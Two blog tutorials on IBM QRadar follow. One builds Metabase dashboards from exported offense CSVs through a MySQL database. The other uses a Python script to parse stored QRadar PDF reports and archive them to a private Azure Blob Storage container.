Arjun

QRadar Dashboards Metabase

2023-10-16T00:00:00+00:00

Introduction

Have you ever wanted to quickly create an interactive QRadar Dashboard on a modern, open-source, self-service Business Intelligence (BI) tool?

In this step-by-step tutorial, we will learn how to leverage Metabase and its new CSV upload feature to import data exports from QRadar and create interactive Dashboards to gather valuable insights.

Note: This tutorial assumes you have admin access to a live QRadar deployment. For the purpose of this tutorial, I am using QRadar Community Edition. Please follow my step-by-step guide - How to install IBM QRadar CE V7.3.3 on VirtualBox to get a basic QRadar deployment up and running in your lab environment.

Pre-requisites

QRadar with admin access

I am using QRadar CE V7.3.3 as described above.

MySQL

I am using MySQL Ver 8.0.34 on a CentOS 7 Linux VM. For more information about installing MySQL 8.0 on your OS, please refer to MySQL Installation Guide.

Metabase Open Source Edition

I am using Metabase v0.47.2 on a CentOS 7 Linux VM. For more information about installing Metabase Open Source Edition on your OS, please refer to Metabase Open Source Edition.

Metabase

According to Metabase documentation:

Metabase is an open-source business intelligence tool. Metabase lets you ask questions about your data, and displays answers in formats that make sense, whether that’s a bar chart or a detailed table.

You can save your questions, and group questions into handsome dashboards. Metabase also makes it easy to share questions and dashboards with the rest of your team.

CSV Uploads on Metabase

According to Metabase documentation:

You can upload data in CSV format to Metabase and start asking questions about it. This feature is best suited for ad hoc analysis of spreadsheet data. If you have a lot of data, or will need to update or add to that data regularly, we recommend setting up a way to load that data into a database directly, then connecting Metabase to that database.

The above snippet from the documentation aptly summarizes the benefits and drawbacks of the CSV feature.

In the past, the only available option was to connect Metabase to a supported database. From our perspective, this means that we need to set up ETL (Extract-Transform-Load) pipelines to fetch data from QRadar (using REST APIs), perform transformations, and persist the transformed data into database tables.

Obviously, it is no simple feat to write, test, and maintain production-ready ETL pipelines. While it is still necessary for most reporting use cases, it is overkill for creating ad hoc Dashboards with quickly exported data. Hence, this new feature from Metabase is a blessing. It is similar to the functionality offered by other popular BI tools such as Power BI.

Note: Please refer to my blog post titled QRadar REST APIs with Logstash to learn how to develop ETL pipelines on Logstash to programmatically fetch raw data from QRadar REST APIs, apply processing, and output into various formats and destinations.

Creating Dashboards

In this section, we will delve into the steps required to create our desired Dashboard on Metabase.

First, we will start by exporting the required CSV data from the QRadar Console. The next step involves configuring Metabase to accept CSV uploads. However, prior to enabling CSV uploads on Metabase, we need to create a new MySQL database and connect it to Metabase. Once the MySQL database is connected to Metabase, we can enable CSV uploads and choose the newly created database as the database to be used for uploads. Next, we will upload the exported QRadar CSV to Metabase as a Model. This step also involves configuring the appropriate column types. Finally, we will leverage the Model to ask Questions and create a new Dashboard with multiple metrics and visualizations.

Exporting QRadar Data

The first step involves exporting the necessary data from the QRadar Console. For the purpose of this tutorial, we will export Offenses from QRadar.

In the Offenses tab, the latest active Offenses are displayed. Click on Actions.

Under the Actions menu, select Export to CSV.

The export will commence. The duration of the export will be determined by the number of Offenses to be exported. Ensure your filters are appropriately set prior to initiating the export.

Download the compressed ZIP file to a local directory.

Unzip the compressed file to extract the CSV file.

For the sake of clarity, rename the CSV file to offenses.

Open the CSV file in Excel (or a text editor of your choice) to view its contents. Validate the columns and rows. The number of Offenses in the CSV file must match the number displayed on the Offenses tab on the QRadar Console.
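If the export is too large to check by eye, a short Python 3 sketch can count the rows for you. It assumes the file was renamed to offenses.csv, that it begins with a single header row, and that it is UTF-8 encoded (with or without a BOM); these are assumptions about the export, not documented QRadar behavior.

```python
import csv


def count_offenses(csv_path):
    """Count the data rows in a CSV export, excluding the header row.

    csv.reader understands quoted fields that span several lines (for
    example, a multi-line description), so the result can differ from a
    plain line count such as `wc -l`.
    """
    with open(csv_path, newline="", encoding="utf-8-sig") as f:
        reader = csv.reader(f)
        next(reader, None)  # skip the header row
        # Blank lines come back as empty lists; do not count them.
        return sum(1 for row in reader if row)

# Usage: print(count_offenses("offenses.csv"))
```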

Note: Expect the export to contain ALL the columns pertaining to each Offense.

For the purpose of this tutorial, we will remove the columns we do not need and retain only a few relevant ones.

Note: The retained columns are: id, magnitude, description, credibility, severity, relevance, eventCount, flowCount, attacker, target, formattedStartTime, formattedEndTime.
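The column purge can also be scripted. The sketch below (Python 3, standard library only) assumes the header names in the export match the list above exactly; the output file name in the usage example is a hypothetical choice. The function raises an error rather than silently writing a file with missing columns.

```python
import csv

# Columns retained for this tutorial (taken from the list above).
KEEP = ["id", "magnitude", "description", "credibility", "severity",
        "relevance", "eventCount", "flowCount", "attacker", "target",
        "formattedStartTime", "formattedEndTime"]


def trim_columns(src_path, dst_path, keep=KEEP):
    """Copy src_path to dst_path, keeping only the columns listed in keep."""
    with open(src_path, newline="", encoding="utf-8-sig") as src, \
            open(dst_path, "w", newline="", encoding="utf-8") as dst:
        reader = csv.DictReader(src)
        missing = [c for c in keep if c not in (reader.fieldnames or [])]
        if missing:
            raise ValueError("columns not found in export: %s" % ", ".join(missing))
        # extrasaction="ignore" drops every column that is not in keep.
        writer = csv.DictWriter(dst, fieldnames=keep, extrasaction="ignore")
        writer.writeheader()
        for row in reader:
            writer.writerow(row)
```

For example, trim_columns("offenses.csv", "offenses_trimmed.csv") writes a copy containing only the retained columns, which you can then rename back to offenses before uploading.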

Configuring Metabase

With the Offenses exported from QRadar, the next step involves configuring Metabase to enable the CSV upload feature.

Configuring MySQL Database on Metabase

According to Metabase documentation:

There are a few things admins need to do to support CSV uploads:

Connect to a database using a database user account with write access. This way Metabase will be able to store the uploaded data somewhere.

Select the database and schema you want to store the uploaded data in.

Add people to a group with unrestricted data access to the upload schema database.

(Optional) specify a prefix for Metabase to prepend to the uploaded tables.

Essentially, this means that we need a database that will be used to store the uploaded CSV data. As mentioned in the pre-requisites, we have chosen MySQL. However, you can also choose PostgreSQL, which is the only other database that supports CSV uploads on Metabase.

To connect the MySQL database with Metabase, start by connecting to MySQL. I am using the MySQL client (mysql).

Create a new database called qradar using the command: CREATE DATABASE qradar;

Note: Use the SHOW DATABASES command to view the existing databases on MySQL.

Now that we have created the database on MySQL, the next step is to configure it on Metabase.

Click on Admin settings.

On the Admin settings page, click on the Databases tab.

On the Databases page, click on Add database.

On the Add databases page, populate the form with connection details to the MySQL database. Click on Save.

Note: It is important to ensure that the connection details are accurate. We have used 127.0.0.1 since MySQL and Metabase are on the same CentOS 7 Linux VM. Depending on your setup, you may need to add/modify firewall rules to ensure connectivity.
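If the connection fails, a quick way to tell a network or firewall problem apart from a credentials problem is a plain TCP check from the Metabase host. This is a minimal Python 3 sketch; 3306 is MySQL's default port, so adjust it if your instance listens elsewhere.

```python
import socket


def can_connect(host, port, timeout=3.0):
    """Return True if a TCP connection to host:port succeeds within timeout."""
    try:
        # create_connection resolves the host and performs the TCP handshake.
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        # Covers refused connections, timeouts (socket.timeout is an OSError
        # subclass) and DNS failures (socket.gaierror).
        return False

# Usage: print(can_connect("127.0.0.1", 3306))
```

If this returns True but Metabase still cannot connect, the problem is more likely the username, password, or database name than the network.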

If all goes well, a pop-up will appear on the bottom-right indicating that the database was added and synced successfully.

Configuring CSV Uploads on Metabase

Navigate back to the Admin settings page. Click on the Uploads tab on the left.

On the Uploads page, click on the Select a database dropdown.

Select QRadar_MySQL from the dropdown.

Once selected, an input box titled Upload Table Prefix (optional) will appear. Although it is optional, I have set the prefix to qradar for the sake of this tutorial. The Enable uploads button will now become active. Click on the button.

If all goes well, the button will turn green and display Uploads enabled. Exit the Admin settings page by clicking on Exit admin on the top-right.

Uploading CSVs to Metabase

The next step involves uploading the QRadar Offenses CSV to Metabase.

Navigate to the Metabase home page. Click on the meatballs menu (yes, it’s actually called meatballs menu) next to COLLECTIONS. Click on + New collection.

According to Metabase documentation:

Collections are the main way to organize questions, dashboards, and models. You can think of them like folders or directories. You can nest collections in other collections, and move collections around. One thing to note is that a single item, like a question or dashboard, can only be in one collection at a time (excluding parent collections).

Populate the New collection form with a Name and an optional Description. Click on Create.

The new collection is created. It is empty and is ready to be filled with Questions, Dashboards, Models, etc.

To upload the Offenses CSV file, click on the Upload data to QRadar icon on the top-right.

The file browser pop-up will open. Locate and select the offenses CSV file. Click on Open.

If all goes well, a pop-up will appear on the bottom-right indicating that the data was added to the QRadar collection.

A new Model, titled Offenses, will appear in the Collection. Click on it.

We can see our QRadar Offenses on Metabase. Great!

It is important to validate the Model, including its column types and formatting, before building Dashboards. To do so, click on the meatballs menu on the right, and click on Edit metadata.

On this page, set the appropriate column type for each column. It is recommended to provide a description for each column to ensure better data governance.

Note: Set the column type for ID as Entity Key.
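An Entity Key is meant to identify each row, much like a primary key, so it may be worth confirming that the id column really is unique before relying on it (for example, if you combined several exports into one file). A minimal Python 3 sketch, assuming the column is named id as in the retained-columns list:

```python
import csv
from collections import Counter


def duplicate_ids(csv_path, id_column="id"):
    """Return {id: count} for every id value that appears more than once."""
    with open(csv_path, newline="", encoding="utf-8-sig") as f:
        counts = Counter(row[id_column] for row in csv.DictReader(f))
    return {value: n for value, n in counts.items() if n > 1}

# Usage: an empty dict from duplicate_ids("offenses.csv") means every id is unique.
```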

Once completed, click on Save changes.

The updated Model will be loaded.

Questions and Dashboards

The final step involves visualizing Questions and creating a Dashboard on Metabase.

Let us start with a simple metric (Question) - Number of Offenses.

To calculate this, we need to essentially perform a count operation. Click on Summarize.

By default, the metric is Count indicating the count of rows in the Model. Click on Done. Click on Save.

Let us save it as a new Question. Click on Save.

Populate the Save new question form with a Name and an optional Description. Click on Save.

Now, we want to add this newly created Question to a Dashboard. Click on Yes please! to proceed.

In the Add this question to a dashboard pop-up, select the QRadar Collection and click on + Create a new dashboard.

Populate the New dashboard form with a Name and an optional Description. Click on Create.

Visualize your data! This is where your creativity can shine.

Note: Please refer to this page from the Metabase documentation, which explains the available visualization types and options in depth.

For this metric (Number of Offenses), we have chosen a simple Number visualization, which looks like a scorecard.

According to Metabase documentation:

The Numbers option is for displaying a single number, nice and big.

The Dashboard is displayed. Let us add some more visualizations. To do this, you will need to create new Questions. Click on + New.

Click on Question.

Click on Models.

Select Offenses under QRadar.

Let us attempt another simple metric (Question) - Offenses by Magnitude.

To calculate this, we need to group the rows by the Magnitude column and count the rows in each group. Click on Visualize.

The screenshot below illustrates how we leverage the Metabase Notebook editor to calculate this metric (Question).

We have a table populated with the result. However, for the Dashboard, we would prefer a visualization. Click on Visualization on the bottom-left.

A bar chart typically works well to represent a simple distribution. Again, the choice of visualization is completely yours :) Click on Done.

Click on Save.

Populate the Save new question form with a Name and an optional Description. Click on Save.

Now, we want to add this newly created Question to a Dashboard. Click on Yes please! to proceed.

Select our existing SIEM Offenses Dashboard.

Add the visualization to the Dashboard. Click on Save.

Great! We now have two visualizations on our SIEM Offenses Dashboard. Feel free to come up with your own metrics (Questions) and add them to your Dashboard.
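To sanity-check the Offenses by Magnitude chart against the raw export, the same grouping and counting can be reproduced in a few lines of Python 3. This sketch assumes the magnitude column holds whole numbers; an empty cell would make int() raise ValueError.

```python
import csv
from collections import Counter


def offenses_by_magnitude(csv_path, column="magnitude"):
    """Count rows per magnitude value, like Count grouped by Magnitude."""
    with open(csv_path, newline="", encoding="utf-8-sig") as f:
        counts = Counter(int(row[column]) for row in csv.DictReader(f))
    # Sort by magnitude so the output reads like the bar chart's x-axis.
    return sorted(counts.items())

# Usage: print(offenses_by_magnitude("offenses.csv"))
```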

Here’s what my final Dashboard looks like!

Conclusion

In this tutorial, we learnt how to build a simple QRadar Dashboard on Metabase, an open-source BI tool, using its new CSV upload feature.

Metabase is a fantastic BI tool and the CSV upload feature is an absolute game changer. While it is still in its infancy, it seems promising for small SOC/SecOps teams to quickly visualize and create ad hoc Dashboards. That being said, for more resilient and automated reporting, the preferred approach should be to leverage ETL pipelines. With the right data engineering and architecture in place, Metabase can easily connect to your database/data warehouse and seamlessly refresh Dashboards.

One of the biggest caveats of the CSV upload feature is the CSV file size limit.

According to Metabase documentation:

CSV files cannot exceed 50 MB in size.

But, they have offered a workaround:

If you have a file larger than 50 MB, the workaround here is to:

Split the data into multiple files.

Upload those files one by one. Metabase will create a new model for each sheet.

Consolidate that data by creating a new question or model that joins the data from those constituent models created by each upload.
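The first step of that workaround, splitting the file, can be scripted. The Python 3 sketch below writes parts that each repeat the header row and stay under a byte limit. The part naming scheme and the 45 MB default (chosen to leave headroom below the documented 50 MB) are assumptions, not Metabase requirements.

```python
import csv
import io


def _encode_row(row):
    """Serialize one row the way csv.writer would, as UTF-8 bytes."""
    buf = io.StringIO()
    csv.writer(buf).writerow(row)
    return buf.getvalue().encode("utf-8")


def split_csv(src_path, out_prefix, max_bytes=45 * 1024 * 1024):
    """Split a CSV into <out_prefix>_1.csv, <out_prefix>_2.csv, ...

    Every part repeats the header row and stays at or below max_bytes,
    unless a single row is larger than the limit on its own.
    Returns the list of part paths that were written.
    """
    parts = []

    def write_part(header, rows):
        path = "%s_%d.csv" % (out_prefix, len(parts) + 1)
        with open(path, "wb") as out:
            out.write(header + b"".join(rows))
        parts.append(path)

    with open(src_path, newline="", encoding="utf-8-sig") as src:
        reader = csv.reader(src)
        first = next(reader, None)
        if first is None:
            return parts  # empty input: nothing to split
        header = _encode_row(first)
        rows, size = [], len(header)
        for row in reader:
            if not row:
                continue  # skip blank lines
            data = _encode_row(row)
            # Close the current part if this row would push it over the limit.
            if rows and size + len(data) > max_bytes:
                write_part(header, rows)
                rows, size = [], len(header)
            rows.append(data)
            size += len(data)
        if rows:
            write_part(header, rows)
    return parts
```

Each part can then be uploaded on its own, producing one Model per file, and the Models combined in a new Question or Model as the documentation describes.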

Using the concepts and steps from this tutorial, you can easily build sophisticated Dashboards with multiple Models representing various QRadar entities such as Offenses, Events, Rules and Networks. If you are limited by the GUI, you can always leverage the Metabase SQL editor. Note that Metabase also offers Pro and Enterprise versions of its software (with cloud and on-prem options). Depending on your requirements, you may opt for either the open-source version or a premium one.

I hope you enjoyed reading this tutorial. Please reach out if you have any questions or comments.

QRadar Reports

2022-12-16T00:00:00+00:00

Introduction

Have you ever wanted to download all your QRadar reports and store them in a centralized location? You could always use the QRadar UI and download each report manually. Instead, how about we automate this tedious task with a Python script?

In this tutorial, we will write a Python script to identify, parse, map, and upload QRadar reports from QRadar to Azure Blob Storage.

Note: This tutorial assumes you have admin access to a live QRadar deployment. For the purpose of this tutorial, I am using QRadar Community Edition. Please follow my step-by-step guide - How to install IBM QRadar CE V7.3.3 on VirtualBox to get a basic QRadar deployment up and running in your lab environment.

Note: This tutorial also assumes you have some experience with Microsoft Azure. This tutorial is not intended to be a deep-dive into Microsoft Azure and will not go into intricate details about the platform and its services. The aim is to leverage Azure Blob Storage as a means to store and organize QRadar reports. If you are new to Azure and Cloud Computing, please refer to Introduction to Azure fundamentals on Microsoft Learn.

Pre-requisites

QRadar with admin access

I am using QRadar CE V7.3.3 as described above.

Python 2.x.x

I am using Python 2.7.5, which comes installed by default on QRadar CE V7.3.3.

Microsoft Azure account

Reports in QRadar

According to IBM QRadar documentation:

You can use the Reports tab to create, edit, distribute, and manage reports. Detailed, flexible reporting options satisfy your various regulatory standards, such as PCI compliance. You can create your own custom reports or use default reports. You can customize and rebrand default reports and distribute these to other users.

Where are QRadar Reports stored?

In QRadar, reports are stored under /store/reporting/reports and are organized by user.

If we open the admin directory, we can see a directory called reports.

If we open the reports directory, there appear to be multiple directories with long names. But what is the naming convention, and where are the actual report files (PDF/HTML/XML/XLS) stored?

To answer the above questions, let us dissect the first directory name:

DAILY#^#admin#$#7eadb7c5-6b75-4c68-b317-56131e60aa6e#^#1658239353030

DAILY

It is clear that the first part of the directory name denotes the report schedule. The schedule can be one of DAILY, HOURLY, WEEKLY, MONTHLY, or MANUAL.

admin

The next part denotes the report owner. The owner will be one of the usernames on QRadar.

7eadb7c5-6b75-4c68-b317-56131e60aa6e

The next part denotes the report ID. This is a unique ID value assigned to a particular report regardless of factors such as schedule or owner.

1658239353030

The last part denotes the number of milliseconds since the Unix epoch when the report was generated.
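Putting the four parts together, a directory name can be parsed with a small helper. This is a sketch that splits on the full #^# and #$# separators seen in the example above (an assumption based on that one name, not a documented format), and it converts the timestamp to UTC using only features available in both Python 2.7 and Python 3.

```python
from collections import namedtuple
from datetime import datetime, timedelta

ReportDir = namedtuple("ReportDir", "schedule owner report_id generated_utc")

EPOCH = datetime(1970, 1, 1)


def parse_report_dir(name):
    """Split a QRadar report directory name into its four parts.

    Expected layout (from the example above):
        SCHEDULE#^#OWNER#$#REPORT_ID#^#EPOCH_MILLIS
    """
    schedule_owner, rest = name.split("#$#", 1)
    schedule, owner = schedule_owner.split("#^#", 1)
    report_id, millis = rest.split("#^#", 1)
    # Epoch milliseconds -> naive UTC datetime (works on Python 2.7 and 3).
    generated = EPOCH + timedelta(milliseconds=int(millis))
    return ReportDir(schedule, owner, report_id, generated)
```

For the example directory above, this yields the schedule DAILY, the owner admin, and a generation time of 2022-07-19 14:02:33.030 UTC. The script later in this tutorial uses datetime.fromtimestamp instead, which converts to the QRadar host's local time.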

If we open this directory, we can see some XML files, metadata files, and a directory called PDF.

Finally, if we open the PDF directory, we can see the actual PDF report document :)

Azure Blob Storage

According to Microsoft Azure documentation:

Azure Blob Storage is Microsoft’s object storage solution for the cloud. Blob Storage is optimized for storing massive amounts of unstructured data. Unstructured data is data that doesn’t adhere to a particular data model or definition, such as text or binary data.

Based on the above description, Azure Blob Storage seems like the perfect cloud-based solution to archive QRadar reports.

Note: You can leverage Amazon Simple Storage Service (Amazon S3) if your preferred Cloud Service Provider is AWS.

Blob Storage offers three types of resources:

The storage account

A container in the storage account

A blob in a container

(Diagram from Microsoft)

Note: Please refer to Introduction to Azure Blob Storage to learn more about the Blob Storage concepts and terminology.
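To make the hierarchy concrete, every blob is addressed by combining all three resources in its URL. The sketch below assumes the default Azure public cloud endpoint (blob.core.windows.net). Because our container will be private, the URL identifies a blob but does not by itself grant access to it.

```python
try:
    from urllib.parse import quote  # Python 3
except ImportError:
    from urllib import quote  # Python 2.7


def blob_url(account, container, blob_name):
    """Build the endpoint URL of a blob: account -> container -> blob."""
    # Keep "/" unescaped so virtual folders in the blob name stay readable;
    # spaces and colons in report names are percent-encoded.
    return "https://%s.blob.core.windows.net/%s/%s" % (
        account, container, quote(blob_name, safe="/"))
```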

Configure Azure Blob Storage

Create Resource Group

The first step is to create a new resource group on the Azure Portal. As seen in the screenshot below, we create a new resource group called QRadar in the East US region. This resource group is the virtual container that will hold our storage account.

Create Storage Account

The next step is to create a new storage account within the QRadar resource group. As seen in the screenshot below, we create a new storage account called qradarreports with resource group as QRadar.

Note: Pay close attention to the redundancy option and select the best option by considering your availability requirements.

Create Container

The next step is to create a new container within the qradarreports storage account. As seen in the screenshot below, we create a new container called qradar-reports with access restricted to Private (no anonymous access).

Note: It is recommended to restrict public access to ensure the confidentiality of the data (QRadar reports with sensitive organization-specific information) being stored on Azure.

According to Microsoft Azure documentation:

When a container is configured for public access, any client can read data in that container. Public access presents a potential security risk, so if your scenario does not require it, we recommend that you disallow it for the storage account.

The newly created container qradar-reports is empty and does not contain any blobs.

Acquire Connection String

Earlier, we created our container qradar-reports with access restricted to Private (no anonymous access). This is a security feature that we enabled to ensure confidentiality of our QRadar reports. If we want to upload blobs to our container, we will need some mechanism of authentication.

According to Microsoft Azure documentation:

Every request made against a storage service must be authorized, unless the request is for a blob or container resource that has been made available for public or signed access. One option for authorizing a request is by using Shared Key.

As seen in the screenshot below, we can view and copy the Connection string (either one) for the qradarreports storage account from the Access keys tab.

Writing the Script

With an understanding of where and how reports are stored on QRadar, we can start writing a Python script to correctly identify, parse, map, and upload all reports to Azure Blob Storage.

Installing Azure Blob Storage Client Library for Python

The easiest way to interact with Azure via Python is by leveraging the Azure Blob Storage client library. The alternative is to DIY by making REST API requests to Azure. If you decide to go down that route, check out the Azure Blob Storage REST API documentation.

According to the project’s PyPI page:

The Azure Storage Blobs client library for Python allows you to interact with three types of resources: the storage account itself, blob storage containers, and blobs.

Now, the easiest way to install the library is by using pip - Python’s package installer. However, pip is not available by default on QRadar CE and requires manual installation.

To install pip, run the following commands in order:

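wget https://bootstrap.pypa.io/pip/2.7/get-pip.py
python get-pip.py

Note: Make sure QRadar has access to the Internet.

Basically, we download get-pip.py using the wget utility and then execute it with Python. The Python 2.7-specific URL is used because the default get-pip.py at https://bootstrap.pypa.io/get-pip.py no longer supports Python 2.7. Check out this link for more information about installing pip.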

Let us install the Azure Blob Storage client library for Python using pip:

pip install --ignore-installed azure-storage-blob

Identify, Parse and Map Reports

In the previous section, we learned that under /store/reporting/reports/admin/reports, each report lives in its own directory, whose name is composed of the report's schedule, owner, unique ID, and time generated.

Now, a question arises - how can we identify the name of a QRadar report based on its ID?

Let us consider the previously discussed directory name as an example:

DAILY#^#admin#$#7eadb7c5-6b75-4c68-b317-56131e60aa6e#^#1658239353030

We identified that the unique report ID is 7eadb7c5-6b75-4c68-b317-56131e60aa6e. But, what is the name of this report?

To answer this question, we must look inside the report.properties file within the directory itself.

As seen in the above screenshot, the report name (or title) is Overview Report. This information is valuable to us for the purpose of archiving reports.

Hence, a good starting point is to write Python code to create a map of report IDs and report names.

We start by importing the required Python packages as seen below.

from os import listdir
from os.path import join, getsize, isdir
import re
from datetime import datetime
from azure.storage.blob import BlobServiceClient

The next step is to define some variables.

base_dir is the full path to the location of the reports on QRadar.

We will also define report_dirs which is an empty list to store the report directory names, and report_name_dir_mapping which is an empty dict to store the mapping between report IDs and report names.

base_dir = '/store/reporting/reports/admin/reports'
report_dirs = []
report_name_dir_mapping = {}

We will also define a string called AZ_CONN_STR, which holds the connection string acquired in the Acquire Connection String section above, and AZ_CONTAINER, which holds the name of the container we created earlier.

AZ_CONN_STR = "DefaultEndpointsProtocol=https;AccountName=qradarreports;AccountKey=...........;EndpointSuffix=core.windows.net"
AZ_CONTAINER = "qradar-reports"
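Hardcoding the account key means anyone who can read the script can access the storage account. A minimal alternative is to read the connection string from an environment variable. The name AZURE_STORAGE_CONNECTION_STRING below is our own choice (it mirrors the name used by Azure tooling such as the Azure CLI), and the parser is only a sanity check that the expected fields are present.

```python
import os


def load_conn_str(var_name="AZURE_STORAGE_CONNECTION_STRING"):
    """Read the storage connection string from an environment variable."""
    value = os.environ.get(var_name)
    if not value:
        raise RuntimeError("environment variable %s is not set" % var_name)
    return value


def parse_conn_str(conn_str):
    """Split 'Key1=value1;Key2=value2;...' into a dict.

    Each item is split on the first '=' only, because the base64
    AccountKey can itself end in '=' padding.
    """
    parts = {}
    for item in conn_str.split(";"):
        if item:
            key, _, value = item.partition("=")
            parts[key] = value
    return parts
```

For example, run export AZURE_STORAGE_CONNECTION_STRING='DefaultEndpointsProtocol=...' in the shell (single quotes keep the semicolons intact), then set AZ_CONN_STR = load_conn_str() in the script and check that parse_conn_str(AZ_CONN_STR)["AccountName"] is qradarreports.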

The next step is to actually create the mapping and populate report_name_dir_mapping.

In the first loop, we collect the report directories and initialize report_name_dir_mapping with one child dict per report ID. Each child dict has a single key, “name”, which will hold the report name and is initialized with an empty string.

In the second loop, we open the report.properties file within each report directory and populate the “name” key for each child dict with the report name (title) corresponding to the report ID.

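# Pass 1: collect every report directory and create an empty entry per report ID.
for report_dir in filter(isdir, map(lambda s: join(base_dir, s), listdir(base_dir))):
    report_dirs.append(report_dir)
    # The name looks like SCHEDULE#^#OWNER#$#ID#^#MILLIS,
    # so splitting on "#" puts the report ID at index 4.
    report_id = report_dir.split("#")[4]
    name = ""
    report_name_dir_mapping[report_id] = {'name': name}

# Pass 2: read each report's title from its report.properties file.
for report_dir in report_dirs:
    report_id = report_dir.split("#")[4]
    file_name = "%s/report.properties" % report_dir
    with open(file_name, "r") as f:
        # Assumes the title is on the second line, e.g. "title=Overview Report".
        raw_title = f.readlines()[1].strip()
        title = re.findall("(title=)(.*)", raw_title)[0][1]
    report_name_dir_mapping[report_id]['name'] = title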

print(report_name_dir_mapping)  # the output below is pretty-printed for readability

'''
{
  "542f895e-9051-4346-866d-b9ccbae8b9d6": {
    "name": "Offense Report"
  },
  "41f88f36-dd50-4ebe-b4d7-e05c23585c84": {
    "name": "Top Users by Remote Access Activity"
  },
  "7eadb7c5-6b75-4c68-b317-56131e60aa6e": {
    "name": "Overview Report"
  }
}
'''
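The second loop assumes the title is always on the second line of report.properties. If that ever changes (Java-style .properties files often start with comment lines), readlines()[1] would pick up the wrong line. A slightly more defensive sketch scans every line for title=. It assumes the same title=value form the regex above expects, and it reads the file as Latin-1, the traditional encoding for Java .properties files, so that unexpected bytes do not raise a decode error. It runs on both Python 2.7 and 3.

```python
import io


def read_report_title(properties_path):
    """Return the value of the first 'title=' line in report.properties.

    Unlike readlines()[1], this does not assume the title is on line 2.
    Returns None if no title line is found.
    """
    with io.open(properties_path, encoding="latin-1") as f:
        for line in f:
            line = line.strip()
            if line.startswith("title="):
                return line[len("title="):]
    return None
```

Inside the second loop, title = read_report_title(file_name) could replace the readlines() and regex lines.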

Upload Reports to Azure

Now that we have created the mapping between report IDs and report names, the next step is to upload each report to Azure using the Azure Blob Storage client library.

We will implement three versions (functions) to organize reports in different styles on Azure Blob Storage.

In version 1, we will simply upload all the PDF report documents to the qradar-reports container on Azure Blob Storage.

In version 2, we will organize reports hierarchically into folders and sub-folders based on the year, month, and day within the qradar-reports container on Azure Blob Storage.

In version 3, we will organize reports into folders based on the report name within the qradar-reports container on Azure Blob Storage.

Note: You can easily modify these functions to create your own style.
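As one example of such a modification, the naming logic can be pulled out of the upload functions into a pure function that is easy to test without Azure. In this hypothetical helper, the date folders are zero-padded (07 rather than 7) so they sort in calendar order in the portal, and any / in a report title is replaced so it cannot create an extra virtual folder. Both are deviations from versions 2 and 3 below, not part of them.

```python
from datetime import datetime


def blob_names(generated, title):
    """Return blob names for the three layouts used in this tutorial.

    generated: datetime the report was generated
    title:     report title from report.properties
    """
    # A "/" inside a title would otherwise create an extra virtual folder.
    safe_title = title.replace("/", "-")
    file_name = "%s %s.pdf" % (generated.strftime("%Y-%m-%d %H:%M:%S"), safe_title)
    return {
        "flat": file_name,  # version 1 style
        # %m and %d are zero-padded, so folders sort chronologically.
        "by_date": "%s/%s" % (generated.strftime("%Y/%m/%d"), file_name),
        "by_name": "%s/%s" % (safe_title, file_name),  # version 3 style
    }
```

For example, blob_names(datetime(2022, 7, 21, 9, 5, 3), "Overview Report")["by_date"] returns "2022/07/21/2022-07-21 09:05:03 Overview Report.pdf".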

Version 1 - All reports in one container

In this version, we start by creating an object of BlobServiceClient called blob_service_client. We then use blob_service_client and its method get_blob_client to initialize a client to represent the blob, which is synonymous with the report PDF. We provide the container name and blob name (report name) as parameters.

Then, we call the blob client's exists() method to check whether the blob already exists, i.e., whether the report PDF was already uploaded. If it exists, we return early with a skip message. If it does not, we upload the report PDF and return the upload metadata so that the caller can print it.

def upload_to_azure(file_name, new_file_name):
    blob_service_client = BlobServiceClient.from_connection_string(AZ_CONN_STR)
    blob_client = blob_service_client.get_blob_client(container=AZ_CONTAINER, blob=new_file_name)
    if blob_client.exists():
        # Already uploaded on a previous run: skip it.
        return "Blob (%s) already exists (skipping)" % new_file_name
    with open(file_name, "rb") as data:
        upload_metadata = blob_client.upload_blob(data)
    return "Uploaded %s" % new_file_name, upload_metadata, "\n"

Version 2 - Reports organized by year, month, and day

This version is a modification of the one above. The main difference is that we extract the year, month, and day using the datetime.strptime function. Thanks to this useful tip for pointing out that we can create hierarchies on Azure Blob Storage by using “/” as a separator. In our case, the blob naming convention would be “<year>/<month>/<day>/<timestamp> <report name>.pdf”.

def upload_to_azure_dt(file_name, new_file_name):
    report_dt = datetime.strptime(new_file_name.split(" ")[0],"%Y-%m-%d")
    report_year = report_dt.year
    report_month = report_dt.month
    report_day = report_dt.day
    new_file_name_dt = "%s/%s/%s/%s" % (report_year,report_month,report_day,new_file_name)
    blob_service_client = BlobServiceClient.from_connection_string(AZ_CONN_STR)
    blob_client = blob_service_client.get_blob_client(container=AZ_CONTAINER, blob=new_file_name_dt)
    if blob_client.exists():
        # Already uploaded on a previous run: skip it.
        return "Blob (%s) already exists (skipping)" % new_file_name_dt
    with open(file_name, "rb") as data:
        upload_metadata = blob_client.upload_blob(data)
    return "Uploaded %s" % new_file_name, upload_metadata, "\n"

Version 3 - Reports organized by name

Like above, this version is also a modification of version 1. The main difference is that we extract the report name using string manipulation techniques. Here, the blob naming convention would be “<report name>/<timestamp> <report name>.pdf”.

def upload_to_azure_report_name(file_name, new_file_name):
    report_name = ' '.join(new_file_name.split(' ')[2:])[:-4]
    new_file_name_report = "%s/%s" % (report_name,new_file_name)
    blob_service_client = BlobServiceClient.from_connection_string(AZ_CONN_STR)
    blob_client = blob_service_client.get_blob_client(container=AZ_CONTAINER, blob=new_file_name_report)
    if blob_client.exists():
        # Already uploaded on a previous run: skip it.
        return "Blob (%s) already exists (skipping)" % new_file_name_report
    with open(file_name, "rb") as data:
        upload_metadata = blob_client.upload_blob(data)
    return "Uploaded %s" % new_file_name, upload_metadata, "\n"

Executing the Script

To execute the script, we simply need to iterate through each report directory stored in the report_dirs list. Then, we use various string manipulation and datetime functions to extract the report’s unique ID and time generated. With the extracted fields, we construct the required file name (or blob name). Finally, we invoke the three Azure upload functions with the required parameters.

for report_dir in report_dirs:
    report_id = report_dir.split("#")[4]
    report_gen = report_dir.split("#")[6]
    report_gen_dt = datetime.fromtimestamp(int(report_gen)/1000.0)
    report_gen_dt_str = report_gen_dt.strftime("%Y-%m-%d %H:%M:%S")
    file_name = "%s/PDF/%s.pdf" % (report_dir,report_id)
    new_file_name = "%s %s.pdf" % (report_gen_dt_str, report_name_dir_mapping[report_id]["name"])
    # version 1
    print(upload_to_azure(file_name, new_file_name))
    # version 2
    print(upload_to_azure_dt(file_name, new_file_name))
    # version 3
    print(upload_to_azure_report_name(file_name, new_file_name))
